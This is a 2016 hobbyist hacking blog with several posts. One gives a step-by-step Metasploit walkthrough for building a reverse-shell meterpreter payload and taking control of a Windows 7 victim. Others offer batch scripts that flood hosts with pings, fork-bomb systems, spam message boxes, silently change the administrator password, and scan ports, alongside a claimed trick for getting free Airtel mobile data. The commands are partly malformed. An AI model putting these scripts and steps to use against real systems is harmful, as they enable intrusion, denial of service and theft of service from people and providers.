Saturday, March 19, 2016

Hack the world

HOW TO HACK WINDOWS by METASPLOIT.......

Metasploit  Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Requirements:

1. MetaSploit Installed ( Kali Linux Distribution)


 2. Two OS running either on same as virtual or physically different

3.. Target host must not be running any AV



Machine 1:  Host   Kali  Linux  Machine

Machine 2: Target Windows 7 Machine


Open the terminal window in Kali-linux  and  type

root:# msfpayload -p windows/meterpreter/reverse_tcp  LHOST= (attacker IP), LPORT=443  --platform windows -a  x86  -f  -o exe /root/Desktop/pruthviraj.exe 

root:# msfconsole (THIS KIND OF BANNER WILL APPEAR)













#msf > use  exploit/multi/handler














Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image


Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload.


A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. A reverse shell is a payload that
creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that
“binds” a command prompt to a listening port on the target machine, which the attacker can then connect.



#msf > set payload windows/meterpreter/reverse_tcp














Now its time to do some configuration for the exploit/payload that we have just set. type the given command


#msf > show options














You should get below default output.

Now we have to set the local host to listen. Type the given below two commands.


#msf > set SRVHOST  192.168.31.20(ATTACKER IP)

This will be your HOST IP address running metasploit.

#msf > set LHOST 192.168.31.20 ( ATTACKER IP)


This will be also be your HOST IP address running metasploit.


Now check if the above applied configuration is applied.


#msf > show options













Now Finally we will start to exploit. Run the command Exploit.


#msf > exploit













Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)


On any Client machine simply open Internet Explorer and try to open http://(LHOST IP WHICH IS GIVEN ) 




Note: it will give your a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.



You can check the number of successful connected session by running the command sessons in msf console.


Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.


--->Sessions means how many targets are installed that exploit make a selection and take a control on it........:-D



#meterpeter > session -i 1


Once connected type linux command to browse inside the System and have full control on it.
















This Documentation is purely for educational purpose. so act with responsibility.

Tuesday, March 1, 2016

LAN chat internal networks

CHAT  WITH  YOUR  FRIEND  IN  LAN    (  Local Area Networks ) :-



Netcat  is a swiss army tool for network/security professionals. You can use it to listen on certain ports or connect to certain ports. For example, say, you configured your firewall to allow TCP 80 traffic to your web server. But your web server is not built yet and you want to validate the rule. You can run netcat on your workstation to listen on port 80, assign the IP address of the web server to your workstation and test the rules.



Requirements:

LINUX    AND     WINDOWS  (or)

WINDOWS-WINDOWS

LINUX-LINUX



 Minimum configurations



Steps:1 First Open the Linux Goto Terminal And Type   nc  -l  169.254.0.0(IP ADD of  PATNER) 

33019


Step 2:Then open the Command prompt in WINDOWS operating system and type nc -l  -p  33019



Step3:  Make sure Two systems are to be in same network and same port to Leastin.


Thats it can chat each other in LAN without Internet..........



Hope you guys are enjoyed....thanks.

Sunday, February 28, 2016

FREE INTERNET


DO U  NEED  FREE  INTERNET   PLE    FOLLOW THIS STEPS:( ONLY FOR AIRTEL )



It is not fake because most recently bug was found in airtel ,in thier port numbers are vulnerability and some researches are found that ,we can access that the  internet from airtel for free.

How This Is Possible please follow my steps


Requirements:

1.Android device
2. Airtel  User
3.Hammar vpn  apk file


....click here to    DOWNLOAD

Step1:

First download the Hammer vpn  apk from Google playstore or Any other sources

Step2:

Then installing that please register the account with credentials

Step3:

Then Open the Hammer Vpn app then set the server first( Any ),then look for LPORT(9201  ), RPORT(9201)......set it then click on connect.


Then goto mobile data option put it on. Thats it u will get internet (3g)


Note:Try it when you dont have credit balance in your mobile



Hope your enjoy with this Article.Thank you.








Tuesday, February 2, 2016

DO U HAVE SECRET FILE ? HIDE DATA INSIDE IMAGES...?

HIDE DATA  INSIDE ..........IMAGES.......!!


step1:   First create any Folder copy the secret files inside

step2:  Then copy Any image inside the folder that you created.

step3:  Make the files compress using .rar Etension .(EXCEPT IMAGE FILE)

step4: Then delete the original files which copied ( FIRST)

step5:  Open command promt type

 

< WINDOWS>dOS PROMPT YOU NEED TO TYPE.........



cd Desktop


cd ( FOLDER NAME) you created

dir

--->IT SHOWS THE FILES INSIDE THAT CONSISTING.

copy /b ( .RAR extension file) +  image file  ( other file name with.jpg) extension  pruthvi.jpg(outfile)
---->IT SHOWS THE MESSAGE LIKE ONE FILE COPIED YOU CAN SEE THIS OUTPUT FILE IN FOLDER 

step6:Delete all the files exepct  image files..

THATS IT U DONE I WILL SEE THE FILE PROPERTIES....IF WANT TO SEE THE HIDDEN FILES INSIDE OF THE IMAGE ...YOU SHOULD HAVE .rar FILE OPEN AND SEE THAT FILE 

hope you will enjoy this article...thank you...  

Monday, January 18, 2016

BEFORE TARGETING ---INFORMATION GATHERING.....IS VERY IMPORTENT ...!!!!

BEFORE HACKING -GATHERING INFORMATION ABOUT TARGET...!


STEP :First select the target and and find thier ip-address.if your choosen example website.

1. goto---->run---->type---->cmd--->type tracert  www.google.com

2.Then it show the results as ip address.

3.Note down the ip-address.

4.then goto kali do follow below steps..

Maltego, is an open source intelligence and forensics application. This is a GUI tool so looks different. Maltego is an information gathering tool that allows you to visually see relationships and it focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining.


Maltego allows you to enumerate network and domain information like  Domain Names, Whois Information, DNS Names, Netblocks, IP Addresses etc


Maltego also allows you to enumerate People information like:
  • Email addresses associated with a person’s name
  • Web sites associated with a person’s name
  • Phone numbers associated with a person’s name
  • Social groups that are associated with a person’s name
  • Companies and organizations associated with a person’s name etc


Maltego also allows you to Do simple verification of email addresses, Search blogs for tags and phrases, Identify incoming links for websites, Extract metadata from files from target domains.



To open graphically go to this menu in your kali linux.


Application → Kali Linux → Information gathering → DNS Analysis → Maltego

OR

Open terminal type maltego and hit enter

Screenshot from 2014-05-14 11:35:57


Screenshot from 2014-05-14 11:36:16


After loading maltego ,it will ask for the further process so click next.

Screenshot from 2014-05-14 11:38:51



Because We are using first time maltego so we need to register and then  log in. So click the register here link.

Screenshot from 2014-05-14 11:39:13


We are new user so we need to register before using this tool. Fill up all details for completing the registration.

After completing your registration go to your mail Id and verify your account by clicking on verification link which is send y maltego.

After verifying your maltego account login with your registered email id and password.

Screenshot from 2014-05-14 11:54:45


Soon you will see a welcome massage.

Screenshot from 2014-05-14 11:54:59

Just click on Next.

Screenshot from 2014-05-14 11:55:35

Click on Finish

Screenshot from 2014-05-14 11:56:06



Click on cancel we will do it manually.

Screenshot from 2014-05-14 11:56:38


Click on new icon (see image) for gathering the information

Screenshot from 2014-05-14 11:56:50


By clicking left button of mouse drag the domain in Main view.
Screenshot from 2014-05-14 11:59:39



Double click on domain icon and rename it into your target domain. Here I am taking  google.com as example.


Here we are searching for top level domain for our target domain. First right click on domain then
Run Transform → All Transforms → To Domain ( Find other TLDs)


Screenshot from 2014-05-15 06:05:16


Here we got the result of TLD search.


Now we are to gain more information about these domains. First of all select all domains by dragging left mouse button or you can select one by one press Shift + left click.


After selecting all domains, right click one of them and then

Run Transform → All Transforms → To Website (Quick-Lookup)

Screenshot from 2014-05-15 06:06:35


Here we are going to search all website which are associate with these domains.


Well here we are just replacing the a website icon I have targeted http://www.google.com for more info follow the image. This is not a necessary part but you should learn it.


Here we are going to find the IP address of our target website. Right click on target website then
Run Transform → Resolve to IP → To IP Address (DNS)

Screenshot from 2014-05-15 06:10:12
Here we got the IP address of our target website and the detail of  where its located.

Thursday, January 14, 2016

Do yOU WANA PLAY WITH U R FRIEND LEARN THIS....

Simple tricks with batch with LAN chatting...


IP Messenger:

The ‘IP Messenger’ works similar to a LAN chat application there by offering the users to chat textually within the same network. The hostname of the recipient is good enough to chat with them.


@echo off
:loop
Title LAN CHAT
color a
Cls

echo                     ########## LAN CHAT ##########//replace what ever you want here//
echo.
echo Type in the hostname of the recipient in the User: Field
echo Enter the Message you wanna convey to the recipient in the Message: Field
echo.
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto loop


Copy and paste the above program in a notepad file and save it as a batch file, you will be getting a pop up windows that exactly looks like below screenshot, when you execute the batch file


Admin Password Changer:

As everyone is aware that windows operating system consists of a built-in administrator account, which has got all the privileges on that particular machine, we are going to use a simple batch program to change the password for that built-in administrator account,

@echo off
Net users administrator p@$$w0rd
Exit


When this batch file is kept in the startup folder of the administrator account, then it will automatically change the password for the administrator account to ‘p@$$w0rd’ at the next login, and if the admin is not aware of this, then he might suffer at the time while trying to login the next time.



Setting an Interactive Reminder:

By using a batch program you can set a reminder for yourself in your computer, so that it will remind you with a pop up message, sound, greetings or whatever at the exact same time when you want it to remind you. This is scheduled using the ‘at’ command that we have already seen,
Say, if I want my computer to remind me at 10:00AM on 13th May 2009, so that I can participate in the Security Conference, I have designed a custom greeting by myself, 

And named it as ‘remindme.jpg’ and placed it in C drive (C:\remindme.jpg), then I have used the following batch to schedule this greeting to pop up exactly at 9:30AM 13th May which is half-an hour before the conference,


@echo off
title Reminder
C:\>at 09:30AM /next:W  "C:remindme.jpg"//WHAT EVER YOU WANA KEEP AS PICTURE//
Exit


It was a Wednesday on may 13th, hence I have used the switch ‘/next:W’ indicating that it was a Wednesday. This program will pop up the greeting that was shown above, exactly at 9:30AM on may 13th, reminding me to attend the conference, more over I must be in front of my computer, working with it, only then it the reminder will pop up else, its mere waste of time doing this


Application Bomber:

Application bomber is a superset of window bomber, this has a close relation to the above given fork bomber program, where in this ‘application bomber’ we don’t call the program using the name itself (simply known as fork), where as we are going to open up applications continuously using a loop.

@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop


When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots. Just imagine the same using a fork concept; oops! it will make the system crash immediately.


Msg Annoyer:

Message annoyer is a batch program that uses the same concept as above, but will interact with the user anyhow annoying and irritating them by popping up some message box containing some messages in it.

@echo off
:annoy
msg * Hi there!
msg * How u doin ?
msg * Are you fine ?
msg * Never mind about me....
msg * I am not here to annoy you....
msg * I am caring for you.....
msg * start counting from 1 to 5, i Will be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoy

Containing the text mentioned in the program given above.

This message box will pop up until for endless loop, which really annoys the person sitting before the computer. Even these small popup windows may crash the computer, if it overloads the memory


Matrix Folder flooder:

The following piece of code is going to help flood you computer with junky folders. This program has the tendency to create more than 3000 folders in just less than a minute.
@echo off
:loop
mkdir %random%
goto loop
Here I have enclosed the screenshot took while I was testing this code on my computer.


Broadcast Bomber:

The ‘broadcast bomber’ will broadcast messages infinitely to all the computers connected to this computer, if it is in a network. Likewise the ‘msg flooder’ program that we have seen already, this helps people to annoy multiple people sitting and working in front of various other computers connected with the same network.

@echo off
:netannoy
net send * Hi there!
net send * How u doin ?
net send * Are you fine ?
net send * Never mind about me....
net send * I am not here to annoy you....
net send * I am caring for you.....
net send * start counting from 1 to 5, i Will be outta this place.....
net send * 1
net send * 2
net send * 3
net send * 4
net send * 5
goto netannoy

Wednesday, January 13, 2016

BATCH PROGRAMMS

NOTE : ple read about that programm and then try to execute it.



Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.


How to create a Batch Program:

As said earlier, batch programs can be written using any of the text editors such as notepad, wordpad and so on, but notepad is the most often used text editor in such cases. Like any other programing languages, lets start our first program with the ‘Hello World’ program.
1. Open up a notepad and type the following.
@echo off Echo Hello World pause
3
2. Save the file with any name you wish, but make sure that you save the file extension with .bat, in this case I am saving this file as ‘first.bat’. 3. When you save the batch file, then the icon becomes like the below icon,
In Windows XP, the Batch file icon looks like above, where as in Windows Vista the Icon looks like the below image,
4. Just double click to execute the batch file that you have created now. And the output looks like,
5. You are done!



*******      Be-care full guys  with this programms***********


SOME EXAMPLE PROGRRAMMS

Packet flooder
:


@echo off
:flood
ping -l 65500 -t 10.199.64.66
start flooder.bat
goto flood


 save this file as flooder.bat....run it .see what happen......

 I have used the fork bombing technique, it will open up lot of command windows on your screen too, there are chances for your computer to crash too.
In the above program I have used my neighboring computer 10.199.64.66 as my victim, and I have tried for just 3 minutes running this program and I found the remote system restarting, until then I have turned off my monitor, because my screen too was flooded with command prompt windows. You may replace the IP address 10.199.64.66 with either your networked computer’s hostname or IP address, if you want to check by yourself.******

Logging system activities:

@echo off
echo. > l1.txt
echo Log File >> l1.txt
echo. >> l1.txt
echo User : %username%  >> l1.txt
Date /t >>l1.txt
Time /t >> l1.txt
echo. >> l1.txt
echo Process Ran by %username% >> l1.txt
echo. >> l1.txt
qprocess  >> l1.txt
echo. >> l1.txt
echo Network Activities  >> l1.txt
netstat -s >> l1.txt
exit
 ABOVE MUST AS .bat formate and then  continue next step..here

<html>
<head><title>Log File - Cybercrawler</title></head>
<body>
<br>
<center><h1><u> Log File </u></h1>
<i>This Log file is created by <b>Cybercrawler</b> for monitoring System Activities!</i>
</center>
<br>
<ul>
<a href="c:\l1.txt">Click here to view the Log File</a>
</ul>
</body>
</html>

THEN COPY ABOVE CODE AND SAVE AS .html AND  PUT  TWO FILES INTO ONE FOLDER ...execute .bat file.....u can see login information and (LOGFILESackets received ,sent.

then go back folder u will find log txt file..open it and watch..enjoy.(MOSTLY USED IN LAN ATTACKS).

Schedule to automate tasks:


As you have learnt in the above chapters, that ‘at’ command is used to automate tasks, here the given script helps automate tasks,

@echo off
rem Automate Deleting temporary files.
at 10:00 AM /every:SU,M,TU,W,TH,F,SA "C:\del_temp_files.bat"
exit


This program will clear all the temp files at 10AM on daily basis, only if logged on. The ‘C:\ del_temp_files.bat’ is the batch file that is given in the previous example

Batch Port Scanner:

The following program checks for open ports by telnetting each port starting from 1 to 20, and if it detects an open port, then it will start a telnet session and reveals the open port. You can also change the port range by changing 1 and 20 to the number you wish.

Batch Port Scanner:
The following program checks for open ports by telnetting each port starting from 1 to 20, and if it detects an open port, then it will start a telnet session and reveals the open port. You can also change the port range by changing 1 and 20 to the number you wish.
@echo off
title Crawlers Port Scanner
color 0a
cd\
cls
for /L %%v in (1,1,20) do telnet %1 %%v
pause


How can turn my blog into proffessional website with valid domain



1.GO TO GO-DADY Or any other hosting website and purchase a domain
2 then go to www.blogger.com
3.create a blog
4. Then go-to settings of blogs and look for the add this into 3rd party options
5.then save it. it will show some options ghs.google..and other code
6.then go to go dady c-pannal then choose the dns settings and make sure you should be in file-zone
7.then edit the option which is c-options....(wwww) then paste it the name of blog
8.then go up side it will show the add a host then go for it and make it options as c-pannal then copy the ghs.google and as a hosting paste google blog which provided code.
9.then finish it and i will promt an window like it will takes 48 hours then go and type u r url on google. u will find...u r blog as website...
thank you hope u r understand.